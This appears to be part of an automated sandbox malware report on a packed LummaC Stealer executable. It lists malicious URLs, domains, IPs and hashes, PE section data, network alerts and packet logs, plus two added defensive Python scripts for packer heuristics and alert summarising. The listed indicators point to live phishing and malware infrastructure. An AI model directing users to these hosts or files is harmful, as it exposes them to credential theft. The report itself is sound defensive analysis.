188.114.97.3 | r_BBVA_MensajeSWIFT04-03-2025-PDF.exe | malicious | FormBook | www.timeinsardinia.info/50g8/
188.114.97.3 | https://u.to/8eAUIg | malicious | HTMLPhisher | staemconmmuntiy.com/gift/id=746904
188.114.97.3 | rRFQ24A.exe | malicious | FormBook | www.sld6.rest/q0rl/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
jowinjoinery.icu | download.php.exe.bin.exe | malicious | Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.204.104
CLOUDFLARENETUS | Fd-Employee-Handbook(1).pdf | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | ATT09858.htm | malicious | HTMLPhisher | 172.67.74.152
CLOUDFLARENETUS | https://poshmark-bundle.sale/reit | malicious | Unknown | 104.17.245.203
CLOUDFLARENETUS | q2e132qweertgd.exe.bin.exe | malicious | AsyncRAT, XWorm | 104.20.4.235
CLOUDFLARENETUS | phish_alert_sp2_2.0.0.0.eml | malicious | Unknown | 104.16.145.15
CLOUDFLARENETUS | download.php.exe.bin.exe | malicious | Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | 104.21.95.8
CLOUDFLARENETUS | PatricksParabox.exe.bin.exe | malicious | Quasar | 172.67.74.152
CLOUDFLARENETUS | SmartPDFPro.msi | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | tsles(x86).exe | malicious | LummaC Stealer | 104.21.93.40
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | tnyg2PUsAn.exe | malicious | Unknown | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | External2.4.exe1.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | Inst#U0430ll.exe | malicious | LummaC Stealer, Xmrig | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | Superority.exe1.exe | malicious | LummaC Stealer | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | tnyg2PUsAn.exe | malicious | Unknown | 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1 | StrikeLeague_Setup_patched.exe | malicious | LummaC Stealer | 188.114.97.3
                                                            No context
                                                            No created / dropped files found
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.903543185534105
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:file.exe
                                                            File size:2'078'208 bytes
                                                            MD5:5583d74a735a4c65191340fd7a465329
                                                            SHA1:b73bb428cc7c3f2e46400d69b619dd21584667cc
                                                            SHA256:213df7a1f96111ae38d9c4b328acb71945f8f3e71a812be045af646abbe28885
                                                            SHA512:c0e9de25e50853ae026637a26bb8266aa1dcfdd18503f559a56e73d4d5f53445dc2ad7571e31757e533f67769dc31bf1c35ef344152a1102df5697966d93cc5b
                                                            SSDEEP:24576:Wd/g+uGY8Bsg7MOCZ0GeelXozCPoGs7dYtEg7R+W7o5cBIclL/1XgoDAURvscD3A:W3s8BtwOCE+CHlgEW7/LtXD7UyMJg
                                                            TLSH:DCA523E7EAC35601E12D28F10D874282B6A5580D1BA1523FBEDC4C669B1FC7DA4F2F16
                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..............................I...........@...........................J....... ...@.................................W...k..
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x89e000
                                                            Entrypoint Section:.taggant
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x67C9DDEB [Thu Mar 6 17:39:55 2025 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entrypoint 0x89e000 in .taggant: a single jmp, after which the listed bytes are padding rather than code; "add byte ptr [eax], al" is how a 00 00 byte pair decodes)
jmp 00007F2B4CF5C75Ah
sete byte ptr [edi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov bl, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x1f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x611f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x5f000 | 0x5f000 | 90babfe8ee7dc0cf3b5a23af3789bc27 | False | 0.6009354440789474 | data | 7.147151884597137 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x60000 | 0x1f0 | 0x200 | 7b69929645c85b6e63c5c85a8157a1fe | False | 0.630859375 | data | 4.90871614401785 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x61000 | 0x1000 | 0x200 | f47b289bcee0e13a937cc29db13607bf | False | 0.150390625 | data | 1.0437720338377494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x62000 | 0x2a2000 | 0x200 | 3f365b7f9ad22b37595e9e12a7b0dd58 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
grpnkoxr | 0x304000 | 0x199000 | 0x198a00 | ee940765eb147a90edaaf5d35e9f1e24 | False | 0.9948958253670848 | OpenPGP Public Key | 7.954246998260437 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gkiotden | 0x49d000 | 0x1000 | 0x400 | c7f08369d65e376aae8b42912aa1ea93 | False | 0.8466796875 | data | 6.425224503524215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x49e000 | 0x3000 | 0x2200 | a44e32d6cabbb537843b584f98b6bf14 | False | 0.08076746323529412 | DOS executable (COM) | 0.924221130466918 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x49c824 | 0x198 | ASCII text, with CRLF line terminators | - | - | 0.5833333333333334
DLL | Import
kernel32.dll | lstrcpy
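The section and import tables above carry the usual unpacking-stub profile: every code-bearing section is readable, writable and executable; grpnkoxr holds 0x198a00 bytes on disk at entropy 7.95 (compressed or encrypted payload); the unnamed section at 0x62000 reserves 0x2a2000 bytes of virtual space backed by only 0x200 bytes on disk, room for the image the stub writes at runtime; the entrypoint sits in the last section, .taggant (the IEEE Software Taggant System section some commercial packers append), not in a first .text; and the entire import table is one kernel32!lstrcpy, so every real API is resolved at runtime. The script below is an added example, not Joe Sandbox's or the sample's code: it encodes those heuristics over the section records transcribed from the table, together with the Shannon entropy calculation behind the Entropy column. The thresholds (entropy 7.0, 8:1 virtual-to-raw ratio, at most 5 imports) and the STANDARD_NAMES set are my assumptions, not anything the report defines.

```python
"""Static packer heuristics over the section/import tables of file.exe.
Added example (not Joe Sandbox or sample code). Section values are transcribed
from the report; thresholds and the standard-name list are assumptions."""
import math
from collections import Counter, namedtuple

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RWX = RW | IMAGE_SCN_MEM_EXECUTE

Section = namedtuple("Section", "name va vsize rawsize entropy flags")

# Transcribed from the report's section table (entropy as the sandbox reported it,
# None where the report says "unknown").
SECTIONS = [
    Section("",         0x1000,   0x5f000,  0x5f000,  7.147, RWX),
    Section(".rsrc",    0x60000,  0x1f0,    0x200,    4.909, RW),
    Section(".idata",   0x61000,  0x1000,   0x200,    1.044, RW),
    Section("",         0x62000,  0x2a2000, 0x200,    None,  RWX),
    Section("grpnkoxr", 0x304000, 0x199000, 0x198a00, 7.954, RWX),
    Section("gkiotden", 0x49d000, 0x1000,   0x400,    6.425, RWX),
    Section(".taggant", 0x49e000, 0x3000,   0x2200,   0.924, RWX),
]
IMAGEBASE = 0x400000
ENTRYPOINT_RVA = 0x89e000 - IMAGEBASE      # Entrypoint minus Imagebase, from the header
IMPORTS = {"kernel32.dll": ["lstrcpy"]}    # the complete import table of the report
STANDARD_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",   # assumption
                  ".reloc", ".bss", ".tls", ".pdata", ".CRT", "CODE", "DATA"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of `data`: 0.0 for a constant run, 8.0 for uniformly random
    bytes. This is what the Entropy column measures over each section's raw bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_for_rva(sections, rva):
    """Section whose virtual range contains `rva`, or None."""
    for s in sections:
        if s.va <= rva < s.va + s.vsize:
            return s
    return None


def label(s):
    return s.name or "<unnamed@%#x>" % s.va


def packer_indicators(sections, ep_rva, imports,
                      entropy_threshold=7.0, virtual_ratio=8, max_imports=5):
    """Return (where, reason) pairs; '-' marks file-level findings."""
    findings = []
    for s in sections:
        # Writable and executable at once: the stub can patch code in place.
        if s.flags & IMAGE_SCN_MEM_WRITE and s.flags & IMAGE_SCN_MEM_EXECUTE:
            findings.append((label(s), "writable+executable section"))
        # Entropy near 8 over real file bytes: compressed or encrypted payload.
        if s.entropy is not None and s.rawsize and s.entropy >= entropy_threshold:
            findings.append((label(s), "entropy %.2f: compressed/encrypted payload" % s.entropy))
        # Large virtual size with almost nothing on disk: filled at runtime.
        if s.vsize >= 0x10000 and s.vsize > virtual_ratio * s.rawsize:
            findings.append((label(s), "%#x bytes virtual vs %#x raw: written at runtime"
                             % (s.vsize, s.rawsize)))
        if s.name and s.name not in STANDARD_NAMES:
            findings.append((label(s), "non-standard section name"))
    ep = section_for_rva(sections, ep_rva)
    if ep is None:
        findings.append(("-", "entrypoint %#x lies outside every section" % ep_rva))
    elif ep is not sections[0]:
        findings.append((label(ep), "entrypoint %#x is not in the first section" % ep_rva))
    n_imports = sum(len(v) for v in imports.values())
    if n_imports <= max_imports:
        findings.append(("-", "only %d import(s): APIs resolved at runtime" % n_imports))
    return findings


if __name__ == "__main__":
    for where, reason in packer_indicators(SECTIONS, ENTRYPOINT_RVA, IMPORTS):
        print("%-20s %s" % (where, reason))
```

On a real file, build the Section records from the section headers (for example with pefile, left out here so the block runs offline) and feed each section's raw bytes to shannon_entropy instead of copying the report's value. None of these indicators is conclusive on its own: installers and commercially protected software produce the same profile, which is why the verdict on this sample rests on the dynamic behaviour signatures rather than on this table.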
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-10T21:04:46.737412+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:09.344558+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49713 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:12.261199+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49714 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:15.741968+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49715 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:18.783285+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49716 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:22.636182+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49717 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:28.038364+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49718 | 188.114.97.3 | 443 | TCP
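All seven alerts above are the same ET rule (SID 2028371, a JA3 client-fingerprint match) against the same server, 188.114.97.3:443, but each comes from a different source port inside roughly 41 seconds: every alert is a fresh TLS handshake, i.e. the sample opens a new connection per request rather than holding one session. The script below is an added example, not part of the report: it parses the alert rows (transcribed here in pipe-separated form), groups them by 5-tuple and reports the connection count and the gaps between alerts, which is what an analyst needs to tell repeated beaconing from a single noisy session. A JA3 hash identifies the TLS client stack, not the malware family; legitimate software built on the same library produces the same hash, so a severity-3 JA3 hit is advisory and here is corroborated by the host-side stealer signatures rather than standing alone.

```python
"""Summarize Suricata alert rows by connection and timing.
Added example (not Joe Sandbox code). ALERT_ROWS is the report's alert table
transcribed into pipe-separated fields."""
from collections import defaultdict
from datetime import datetime
from statistics import median

ALERT_ROWS = """\
2025-03-10T21:04:46.737412+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:09.344558+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49713 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:12.261199+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49714 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:15.741968+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49715 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:18.783285+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49716 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:22.636182+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49717 | 188.114.97.3 | 443 | TCP
2025-03-10T21:05:28.038364+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49718 | 188.114.97.3 | 443 | TCP
"""

FIELDS = ("ts", "sid", "signature", "severity",
          "src_ip", "src_port", "dst_ip", "dst_port", "proto")


def parse_alert(line):
    """One pipe-separated row -> dict with typed timestamp, SID, ports."""
    parts = [p.strip() for p in line.split("|")]
    if len(parts) != len(FIELDS):
        raise ValueError("expected %d fields, got %d: %r" % (len(FIELDS), len(parts), line))
    a = dict(zip(FIELDS, parts))
    a["ts"] = datetime.strptime(a["ts"], "%Y-%m-%dT%H:%M:%S.%f%z")  # %z accepts +0100
    for key in ("sid", "severity", "src_port", "dst_port"):
        a[key] = int(a[key])
    return a


def parse_alerts(text):
    return [parse_alert(line) for line in text.splitlines() if line.strip()]


def summarize(alerts):
    """Group alerts by 5-tuple and measure the spacing between them."""
    flows = defaultdict(list)
    for a in alerts:
        flows[(a["src_ip"], a["src_port"], a["dst_ip"], a["dst_port"], a["proto"])].append(a)
    ts = sorted(a["ts"] for a in alerts)
    gaps = [(later - earlier).total_seconds() for earlier, later in zip(ts, ts[1:])]
    return {
        "alerts": len(alerts),
        "sids": sorted({a["sid"] for a in alerts}),
        "servers": sorted({(a["dst_ip"], a["dst_port"]) for a in alerts}),
        "connections": len(flows),                         # distinct 5-tuples
        "alerts_per_connection": max(len(v) for v in flows.values()),
        "span_s": round((ts[-1] - ts[0]).total_seconds(), 1),
        "min_gap_s": round(min(gaps), 1) if gaps else None,
        "median_gap_s": round(median(gaps), 1) if gaps else None,
        "max_gap_s": round(max(gaps), 1) if gaps else None,
    }


if __name__ == "__main__":
    for key, value in summarize(parse_alerts(ALERT_ROWS)).items():
        print("%-22s %s" % (key, value))
```

For these rows the summary is 7 alerts, 1 SID, 1 server, 7 connections with 1 alert each, a 41.3 s span and gaps between 2.9 s and 22.6 s (median 3.7 s): one fingerprinted handshake per connection, which matches the short-lived TLS sessions in the packet log that follows. Feed the same function an EVE JSON export converted to these nine fields and the connection count is the figure to pivot on.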
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 10, 2025 21:04:45.031672001 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:04:45.031717062 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:04:45.031800985 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:04:45.033320904 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:04:45.033337116 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:04:46.737255096 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:04:46.737411976 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:04:46.740966082 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:04:46.740976095 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:04:46.741231918 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:04:46.781495094 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:04:46.793612957 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:04:46.793649912 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:04:46.793732882 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.137039900 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.137197971 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.137250900 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.137268066 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.137296915 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.137341022 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.137346983 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.143820047 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.143867970 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.143888950 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.150558949 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.150604010 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.150629997 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.157489061 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.157511950 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.157556057 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.157582045 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.157636881 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.349101067 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.350974083 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.351013899 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.351306915 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.351463079 CET | 443 | 49708 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.351506948 CET | 49708 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.645366907 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.645453930 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:07.645518064 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.646284103 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:07.646311998 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:09.344422102 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:09.344558001 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:09.369853020 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:09.369873047 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:09.370242119 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:09.372715950 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:09.373083115 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:09.373101950 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:09.373147011 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:09.420330048 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:10.322992086 CET | 443 | 49713 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:10.323700905 CET | 49713 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:10.448913097 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:10.448960066 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:10.449151039 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:10.449496984 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:10.449508905 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:12.261120081 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:12.261198997 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:12.269839048 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:12.269870043 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:12.270178080 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:12.279221058 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:12.279337883 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:12.279386044 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:12.279547930 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:12.279558897 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:13.527307034 CET | 443 | 49714 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:13.527784109 CET | 49714 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:13.800884962 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:13.800936937 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:13.805881977 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:13.806329966 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:13.806341887 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:15.741892099 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:15.741967916 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:15.752566099 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:15.752584934 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:15.752922058 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
Mar 10, 2025 21:05:15.754632950 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:15.754882097 CET | 49715 | 443 | 192.168.2.5 | 188.114.97.3
Mar 10, 2025 21:05:15.754908085 CET | 443 | 49715 | 188.114.97.3 | 192.168.2.5
